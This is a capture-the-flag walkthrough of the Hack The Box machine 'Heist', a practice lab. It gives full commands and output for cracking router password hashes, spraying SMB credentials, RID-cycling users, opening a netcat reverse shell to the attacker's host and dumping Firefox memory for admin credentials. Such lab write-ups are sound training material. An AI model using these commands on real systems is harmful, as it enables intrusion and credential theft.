HTB - Heist

Enumeration

Scope

IP Address: 10.10.10.149

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p1-10000 $ip -Pn -n --disable-arp-ping -vv --min-rate 10000

PORT     STATE SERVICE      REASON
80/tcp   open  http         syn-ack
135/tcp  open  msrpc        syn-ack
445/tcp  open  microsoft-ds syn-ack
5985/tcp open  wsman        syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ nmap -p80,135,445,5985 $ip -sCV -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-06T23:55:49
|_  start_date: N/A

* Open ports: 80 - 135 - 445 - 5985
* UDP Open ports: None
* Services: HTTP - RPC - SMB - winRM
* Versions:IIS httpd 10.0

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ smbclient -N -L //$ip                       
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u ''  -p '' --shares  
SMB     10.10.10.149    445    SUPPORTDESK  [-] SupportDesk\: STATUS_ACCESS_DENIED

We can see that SMB enumeration failed, switching to RPC, but also failed

RPC

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

HTTP

web page at http://10.10.10.149/login.php

I tried to supply default credentials, but the login button didn't send any request to the backend server, However Login as guest took my attention and click it

It took me to http://10.10.10.149/issues.php as shown above.

From this page I could extract some useful information:

usernames: Hazard, Support Admin
Attachment: http://10.10.10.149/attachments/config.txt

http://10.10.10.149/attachments/config.txt

If you configured Cisco router before, you would be familiar with this syntax and commands. We can extract additional information:

username: rout3r, admin

password hashes:
0242114B0E143F015F5D1E161713
02375012182C1A1D751618034F36415408
$1$pdQG$o8nrSzsGXeaduXrjlvKc91

My plan was to create a list of usernames and passwords after cracking it and brute forcing SMB protocol.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat users.list
Hazard
"support Admin"
rout3r
admin

I had to know the hash type to be able to crack it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ hashid -m '$1$pdQG$o8nrSzsGXeaduXrjlvKc91'                              

[+] MD5 Crypt [Hashcat Mode: 500]
[+] Cisco-IOS(MD5) [Hashcat Mode: 500]
[+] FreeBSD MD5 [Hashcat Mode: 500]

Sense this hash is obtained from router configuration, the hash type should be Cisco-IOS(MD5)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ hashcat -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' /usr/share/wordlists/rockyou.txt

<snip>
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent              
Session..........: hashcat
Status...........: Cracked

The command username <user> password 7 <hash> reveals that the encryption type is 7 which I can search about

I got a tool that can decrypt type-7 hash:

Cisco Type 7 Password Decrypt / Decoder / Crack Toolwww.firewall.cx

Now, I'm going to create a passwords list and then brute force SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat passwords.list      
stealth1agent
Q4)sJu\Y8qz*A3?d
$uperP@ssword

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u users.list -p passwords.list --continue-on-success

SMB  10.10.10.149    445    SUPPORTDESK  [+] SupportDesk\Hazard:stealth1agent 
<snip>

I tried to enumerate SMB with the credentials I've found but nothing interesting found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u Hazard -p 'stealth1agent' --shares               

SMB  10.10.10.149   445     SUPPORTDESK      ADMIN$         Remote Admin
SMB  10.10.10.149   445     SUPPORTDESK       C$            Default share
SMB  10.10.10.149   445     SUPPORTDESK      IPC$    READ   Remote IPC

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ smbclient -U Hazard \\\\$ip\\IPC$       

smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit

No options available now for me except enumerating RPC with hazard credentials. I tried several commands to enumerate the machine but these only two worked

rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

So, the domain SID is S-1-5-21-4254423774-1266059056-3197185112 and RID is added to the end I wanted to enumerate users on the machine but enumdomuers failed, however lookupnames & lookupsids can be used for that purpose.

The user SID contain two parts:
- SID of the domain
- RID of the user
I knew from previous experience that RID count starts with 500 which is the administrator RID and regular users start for 1000, So I will generate a wordlist {500:510} for admins accounts & {1000:1100} for regular users.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for rid in {500..510};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids.txt;done

for rid in {1000..1100};do echo "S-1-5-21-4254423774-1266059056-3197185112-$rid" >> sids1.txt;done

Loop with the two wordlists and redirect the output to results.txt and then read the files

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for sid in $(cat sids.txt);do rpcclient -U "Hazard%stealth1agent" $ip -c "lookupsids $sid" >> results.txt;done

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ for sid in $(cat sids1.txt);do rpcclient -U "Hazard%stealth1agent" $ip -c "lookupsids $sid" >> results.txt;done

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat results.txt | grep -v unknown                         
S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\Administrator (1)
S-1-5-21-4254423774-1266059056-3197185112-501 SUPPORTDESK\Guest (1)
S-1-5-21-4254423774-1266059056-3197185112-503 SUPPORTDESK\DefaultAccount (1)
S-1-5-21-4254423774-1266059056-3197185112-504 SUPPORTDESK\WDAGUtilityAccount (1)
S-1-5-21-4254423774-1266059056-3197185112-513 SUPPORTDESK\None (2)
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)

Initial Access

I created a wordlist for newly-discovered users and then bruted force the SMB again

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ cat users.lst                    
Hazard
support
Chase
Jason

We got a hit :)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u users.lst -p passwords.list 

<snip>
SMB   10.10.10.149    445    SUPPORTDESK   [+] SupportDesk\Chase:Q4)sJu\Y8qxxxxxx

I will try now to test winrm connection with crackmapexec to see if we can login with user Chase

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec winrm $ip -u Chase -p 'Q4)sJu\Y8qxxxxxxx'

WINRM 10.10.10.149  5985 SUPPORTDESK  [+] SupportDesk\Chase:Q4)sJu\Y8qxxxxxxx (Pwn3d!)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ evil-winrm -i $ip -u Chase -p 'Q4)sJu\Y8qxxxxxxx'

*Evil-WinRM* PS C:\Users\Chase\Documents>

*Evil-WinRM* PS C:\Users\Chase> type Desktop\user.txt
7ec14ed02a46043fc7c55xxxxxxxxxxxxxxxx

User Flag: 7ec14ed02a46043fc7cxxxxxxxxxxxxx

Privilege Escalation

evil-winrm is too slow, So I will upload nc and get a shell instead of it

*Evil-WinRM* PS C:\Tools> upload nc.exe
*Evil-WinRM* PS C:\Tools> .\nc.exe 10.10.16.25 443 -e PowerShell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.149] 49716
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Tools>

I didn't find many interesting things since I landed as Chase, So I run Winpeas.exe and it highlighted these files as read:

C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\cert9.db

Unfortunately, after I extracted the secrets from these files, it didn't reveal anything useful.

Next, I got a hint from community to change my mind and dump Firefox process from memory, Let's see how I did it.

I uploaded procdump.exe from Sysinternals suite, got the process-ID of Firefox and began to dump it

PS C:\Tools> curl 10.10.16.25/procdump.exe -o .\p.exe

PS C:\Tools> Get-Process -name firefox

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    347      19    10236      35660       0.11   4136   1 firefox
   1089      72   151396     228756       4.92   6036   1 firefox
    401      33    32148      90740       0.59   6280   1 firefox
    378      28    22600      59420       0.38   6484   1 firefox
    355      25    16464      38936       0.13   6764   1 firefox

PS C:\Tools> .\p.exe -accepteula -ma 6764

[08:04:29] Dump 1 initiated: C:\Tools\firefox.exe_240707_080429.dmp
[08:04:29] Dump 1 writing: Estimated dump file size is 298 MB.

Start smbserver and copy the dump to my attack host

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ impacket-smbserver -smb2support share .

PS C:\Tools> copy firefox.exe_240707_080429.dmp \\10.10.16.25\share

The dmp file is a binary file, So using grep will work only with strings command

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ strings firefox.exe_240707_080429.dmp | grep "administrator\|password"

<snip>
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8xxxxx&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]xxxxx&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8xxxxx&login=
<snip>

The Credentials found:

admin@support.htb:4dD!5}x/re8]xxxxxx

I will try to test these creds with crackmapexec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ crackmapexec smb $ip -u administrator -p '4dD!5}x/re8]xxxxxx'

SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

And we gained administrator account :)

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Heist]
└─$ impacket-psexec supportdesk/administrator@$ip                                  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:

C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt  
906f0e1ac412590d0bdc50xxxxxxxxxx

Root Flag: 906f0e1ac412590d0xxxxxxxxxxx

PreviousHTB - Remote NextHTB - Sauna

Last updated 1 year ago